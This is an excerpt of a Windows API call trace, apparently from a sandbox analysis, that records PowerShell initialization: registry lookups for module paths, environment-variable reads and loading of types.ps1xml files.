	[0444.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.625] CoTaskMemFree (pv=0x2eadc0) 
	[0444.626] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.626] CoTaskMemFree (pv=0x2eadc0) 
	[0444.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0444.844] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.844] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0444.845] CoTaskMemFree (pv=0x2eadc0) 
	[0444.846] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d4d50
	[0444.846] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7d4d50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0444.846] CoTaskMemFree (pv=0x1b7d4d50) 
	[0444.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d968 | out: phkResult=0x12d968*=0x320) returned 0x0
	[0444.846] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d8ec, lpData=0x0, lpcbData=0x12d8e8*=0x0 | out: lpType=0x12d8ec*=0x2, lpData=0x0, lpcbData=0x12d8e8*=0x6c) returned 0x0
	[0444.847] CoTaskMemAlloc (cb=0x70) returned 0x33f830
	[0444.847] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d8bc, lpData=0x33f830, lpcbData=0x12d8b8*=0x6c | out: lpType=0x12d8bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d8b8*=0x6c) returned 0x0
	[0444.847] CoTaskMemFree (pv=0x33f830) 
	[0444.847] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d4d50
	[0444.847] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7d4d50, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0444.847] CoTaskMemFree (pv=0x1b7d4d50) 
	[0444.847] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d4d50
	[0444.847] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7d4d50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0444.847] CoTaskMemFree (pv=0x1b7d4d50) 
	[0444.851] RegCloseKey (hKey=0x320) returned 0x0
	[0444.851] CoTaskMemAlloc (cb=0xcc) returned 0x1b7d4d50
	[0444.851] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7d4d50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0444.851] CoTaskMemFree (pv=0x1b7d4d50) 
	[0444.851] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d968 | out: phkResult=0x12d968*=0x320) returned 0x0
	[0444.851] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d8ec, lpData=0x0, lpcbData=0x12d8e8*=0x0 | out: lpType=0x12d8ec*=0x0, lpData=0x0, lpcbData=0x12d8e8*=0x0) returned 0x2
	[0444.851] RegCloseKey (hKey=0x320) returned 0x0
	[0444.861] CoTaskMemAlloc (cb=0x20c) returned 0x391f90
	[0444.861] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x391f90 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0444.862] CoTaskMemFree (pv=0x391f90) 
	[0444.862] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0444.864] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0444.874] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.874] CoTaskMemFree (pv=0x2eadc0) 
	[0444.877] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.877] CoTaskMemFree (pv=0x2eadc0) 
	[0444.881] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.882] CoTaskMemFree (pv=0x2eadc0) 
	[0444.882] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.882] CoTaskMemFree (pv=0x2eadc0) 
	[0444.884] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d758 | out: phkResult=0x12d758*=0x328) returned 0x0
	[0444.885] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x12d76c, lpData=0x0, lpcbData=0x12d768*=0x0 | out: lpType=0x12d76c*=0x1, lpData=0x0, lpcbData=0x12d768*=0x74) returned 0x0
	[0444.885] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x12d6dc, lpData=0x0, lpcbData=0x12d6d8*=0x0 | out: lpType=0x12d6dc*=0x1, lpData=0x0, lpcbData=0x12d6d8*=0x74) returned 0x0
	[0444.885] CoTaskMemAlloc (cb=0x78) returned 0x33f830
	[0444.885] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x12d6ac, lpData=0x33f830, lpcbData=0x12d6a8*=0x74 | out: lpType=0x12d6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d6a8*=0x74) returned 0x0
	[0444.885] CoTaskMemFree (pv=0x33f830) 
	[0444.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0444.885] SetErrorMode (uMode=0x1) returned 0x1
	[0444.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d630 | out: lpFileInformation=0x12d630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0444.885] SetErrorMode (uMode=0x1) returned 0x1
	[0444.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0444.888] SetErrorMode (uMode=0x1) returned 0x1
	[0444.888] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d630 | out: lpFileInformation=0x12d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0444.888] SetErrorMode (uMode=0x1) returned 0x1
	[0444.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0444.893] SetErrorMode (uMode=0x1) returned 0x1
	[0444.893] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d630 | out: lpFileInformation=0x12d630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0444.893] SetErrorMode (uMode=0x1) returned 0x1
	[0444.897] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.897] CoTaskMemFree (pv=0x2eadc0) 
	[0444.908] CoTaskMemAlloc (cb=0x104) returned 0x2eadc0
	[0444.908] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eadc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0444.908] CoTaskMemFree (pv=0x2eadc0) 
	[0444.909] GetACP () returned 0x4e4
	[0444.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0444.917] SetErrorMode (uMode=0x1) returned 0x1
	[0444.918] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0444.918] GetFileType (hFile=0x32c) returned 0x1
	[0444.918] SetErrorMode (uMode=0x1) returned 0x1
	[0444.918] GetFileType (hFile=0x32c) returned 0x1
	[0444.919] ReadFile (in: hFile=0x32c, lpBuffer=0x2e2bbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2e2bbb8*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0444.922] ReadFile (in: hFile=0x32c, lpBuffer=0x2e2bbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2e2bbb8*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0444.923] ReadFile (in: hFile=0x32c, lpBuffer=0x2e2bbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2e2bbb8*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0444.923] ReadFile (in: hFile=0x32c, lpBuffer=0x2e2bbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2e2bbb8*, lpNumberOfBytesRead=0x12d568*=0xcf3, lpOverlapped=0x0) returned 1
	[0444.923] ReadFile (in: hFile=0x32c, lpBuffer=0x2e2b013, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2e2b013*, lpNumberOfBytesRead=0x12d568*=0x0, lpOverlapped=0x0) returned 1
	[0444.923] ReadFile (in: hFile=0x32c, lpBuffer=0x2e2bbb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2e2bbb8*, lpNumberOfBytesRead=0x12d568*=0x0, lpOverlapped=0x0) returned 1
	[0444.926] CloseHandle (hObject=0x32c) returned 1
	[0444.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0444.931] SetErrorMode (uMode=0x1) returned 0x1
	[0444.931] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d4e0 | out: lpFileInformation=0x12d4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0444.932] SetErrorMode (uMode=0x1) returned 0x1
	[0444.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0444.933] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5c8 | out: phkResult=0x12d5c8*=0x32c) returned 0x0
	[0444.934] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d54c, lpData=0x0, lpcbData=0x12d548*=0x0 | out: lpType=0x12d54c*=0x1, lpData=0x0, lpcbData=0x12d548*=0x56) returned 0x0
	[0444.934] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d1c00
	[0444.934] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d51c, lpData=0x1b7d1c00, lpcbData=0x12d518*=0x56 | out: lpType=0x12d51c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d518*=0x56) returned 0x0
	[0444.934] CoTaskMemFree (pv=0x1b7d1c00) 
	[0444.934] RegCloseKey (hKey=0x32c) returned 0x0
	[0444.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0444.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0445.205] GetSystemInfo (in: lpSystemInfo=0x12c200 | out: lpSystemInfo=0x12c200*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0445.206] VirtualQuery (in: lpAddress=0x12c2b0, lpBuffer=0x12d170, dwLength=0x30 | out: lpBuffer=0x12d170*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0445.220] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0445.221] GetFileType (hFile=0x328) returned 0x1
	[0445.221] SetErrorMode (uMode=0x1) returned 0x1
	[0445.221] GetFileType (hFile=0x328) returned 0x1
	[0445.221] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.222] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.222] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.222] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.222] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.223] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.223] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.223] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.223] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.224] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.224] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
	[0445.224] ReadFile (in: hFile=0x328, lpBuffer=0x2d18738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d568, lpOverlapped=0x0 | out: lpBuffer=0x2d18738*, lpNumberOfBytesRead=0x12d568*=0x1000, lpOverlapped=0x0) returned 1
